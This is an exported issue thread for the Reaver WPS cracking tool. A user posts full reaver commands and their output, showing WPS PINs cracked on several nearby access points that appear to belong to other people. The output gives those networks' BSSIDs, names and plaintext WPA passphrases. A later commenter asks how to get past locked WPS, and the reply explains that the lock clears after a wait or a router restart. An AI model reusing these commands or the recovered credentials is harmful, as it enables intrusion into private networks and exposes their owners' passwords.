cbank327 / reaver-wps

Automatically exported from code.google.com/p/reaver-wps
0 stars 0 forks source link

Is it password? #380

Open GoogleCodeExporter opened 8 years ago

GoogleCodeExporter commented 8 years ago
A few things to consider before submitting an issue:

0. We write documentation for a reason, if you have not read it and are
having problems with Reaver these pages are required reading before
submitting an issue:
http://code.google.com/p/reaver-wps/wiki/HintsAndTips
http://code.google.com/p/reaver-wps/wiki/README
http://code.google.com/p/reaver-wps/wiki/FAQ
http://code.google.com/p/reaver-wps/wiki/SupportedWirelessDrivers
1. Reaver will only work if your card is in monitor mode.  If you do not
know what monitor mode is then you should learn more about 802.11 hacking
in linux before using Reaver.
2. Using Reaver against access points you do not own or have permission to
attack is illegal.  If you cannot answer basic questions (i.e. model
number, distance away, etc) about the device you are attacking then do not
post your issue here.  We will not help you break the law.
3. Please look through issues that have already been posted and make sure
your question has not already been asked here: http://code.google.com/p
/reaver-wps/issues/list
4. Often times we need packet captures of mon0 while Reaver is running to
troubleshoot the issue (tcpdump -i mon0 -s0 -w broken_reaver.pcap).  Issue
reports with pcap files attached will receive more serious consideration.

Answer the following questions for every issue submitted:

0. What version of Reaver are you using?  (Only defects against the latest
version will be considered.) reaver 1.4

1. What operating system are you using (Linux is the only supported OS)?

Ubuntu 12.04 64bit

2. Is your wireless card in monitor mode (yes/no)?

Yes

3. What is the signal strength of the Access Point you are trying to crack?

-61

4. What is the manufacturer and model # of the device you are trying to
crack?

Alfa awus o36H rtl8187

5. What is the entire command line string you are supplying to reaver?

reaver - i mon0 -b bssid -c x -vv

6. Please describe what you think the issue is.

no idea

7. Paste the output from Reaver below.

[+] Trying pin 99466978
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 2696 seconds
[+] WPS PIN: '99466978'
[+] WPA PSK: 'elizabeth1989'
[+] AP SSID: 'Dios es amor'

kasper@kasper:~$ sudo reaver -i mon0 -b F4:EC:38:FC:24:EE -c 1 -vv -p 99466978

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[+] Switching mon0 to channel 1
[+] Waiting for beacon from F4:EC:38:FC:24:EE
[+] Associated with F4:EC:38:FC:24:EE (ESSID: Dios es amor)
[+] Trying pin 99466978
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 4 seconds
[+] WPS PIN: '99466978'
[+] WPA PSK: 'elizabeth1989'
[+] AP SSID: 'Dios es amor'

 CH  6 ][ Elapsed: 8 s ][ 2012-08-19 16:36 ][ fixed channel mon0: -1                               

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                

 14:D6:4D:B1:D5:C8  -56  11       13        0    0   6  54e  WPA2 CCMP   PSK  Luisana Evansio      

kasper@kasper:~$ sudo reaver -i mon0 -b 14:D6:4D:B1:D5:C8 -c 6 -vv -p 56635836

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[+] Switching mon0 to channel 6
[+] Waiting for beacon from 14:D6:4D:B1:D5:C8
[+] Associated with 14:D6:4D:B1:D5:C8 (ESSID: Luisana Evansio)
[+] Trying pin 56635836
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 6 seconds
[+] WPS PIN: '56635836'
[+] WPA PSK: 'luisana15831815'
[+] AP SSID: 'Luisana Evansio'

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                  

 F4:EC:38:AC:BF:3C  -61   2       70       67    8   1  54e. WPA2 CCMP   PSK  TP-LINK_ACBF3C 

kasper@kasper:~$ sudo reaver -i mon0 -b F4:EC:38:AC:BF:3C -c 1 -p 20050092 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[+] Switching mon0 to channel 1
[+] Waiting for beacon from F4:EC:38:AC:BF:3C
[+] Associated with F4:EC:38:AC:BF:3C (ESSID: TP-LINK_ACBF3C)
[+] Trying pin 20050092
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 4 seconds
[+] WPS PIN: '20050092'
[+] WPA PSK: '3BCD8597FD2E61A2827C44FD625C6848443C2BD6C3EEE5DA710F1B10C17950EC'
[+] AP SSID: 'Network-f4ec38acbf3c'

[+] WPS PIN: '20050092'
[+] WPA PSK: '4AE1DA1D9BF0733C4A0C1B7D16D5F4E5E4F69C270211B0A3594EC5B4679AFBC7'
[+] AP SSID: 'Network-f4ec38acbf3c'

+] WPS PIN: '20050092'
[+] WPA PSK: 'C18852B2501F7BAC93CADCFA2814E88C12485946B26313A8B844231C7E78AED9'
[+] AP SSID: 'Network-f4ec38acbf3c'

[+] Nothing done, nothing to save.
kasper@kasper:~$ sudo reaver -i mon0 -b F4:EC:38:AC:BF:3C -c 1 -p 20050092 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[+] Switching mon0 to channel 1
[+] Waiting for beacon from F4:EC:38:AC:BF:3C
[+] Associated with F4:EC:38:AC:BF:3C (ESSID: TP-LINK_ACBF3C)
[+] Trying pin 20050092
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 4 seconds
[+] WPS PIN: '20050092'
[+] WPA PSK: 'AE4AA94825D00D9E7CE068BF2BD409536ADAA85149AFEA212FE183D3848EBF27'
[+] AP SSID: 'Network-f4ec38acbf3c'
[+] Nothing done, nothing to save

any idea whats problems? i know this question was several times,but no good 
idea.
Like you see reaver properly work,why it give to me unknown psk key
 thks

Original issue reported on code.google.com by karpe...@gmail.com on 19 Aug 2012 at 9:31

GoogleCodeExporter commented 8 years ago
hi:regarding to wps enabled router hacking everything works well for me but 
what if the  WPS is locked any idea how to crack it? 
coz i could crack D-Link whiten 3 hours and i have a disabled the WPS now i 
want to know if there is any possibility to crack locked WPS

Original comment by g.rahim...@gmail.com on 25 Dec 2013 at 6:32

GoogleCodeExporter commented 8 years ago
hi,
if wps locked, sometimes after few minutes unblock,
but sometimes unblock can only after restart router!

Original comment by karpe...@gmail.com on 26 Dec 2013 at 10:40